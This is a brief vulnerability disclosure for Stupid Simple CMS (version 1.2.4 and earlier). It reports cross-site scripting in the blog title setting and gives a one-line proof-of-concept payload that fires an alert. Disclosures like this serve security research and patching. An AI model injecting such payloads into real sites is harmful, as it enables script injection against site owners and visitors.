product: Stupid Simple CMS ( Blogger )
download link: https://github.com/codelyfe/Stupid-Simple-CMS
version:<=1.2.4
There is Cross-Site Scripting (XSS) vulnerability within the blog title of the settings.
poc:
"><img src=1 onerror=alert(1)>
successed
![2](https://github.com/kilooooo/cms/assets/52652352/bec69f2a-b9b6-4603-acbd-2bb84e862871)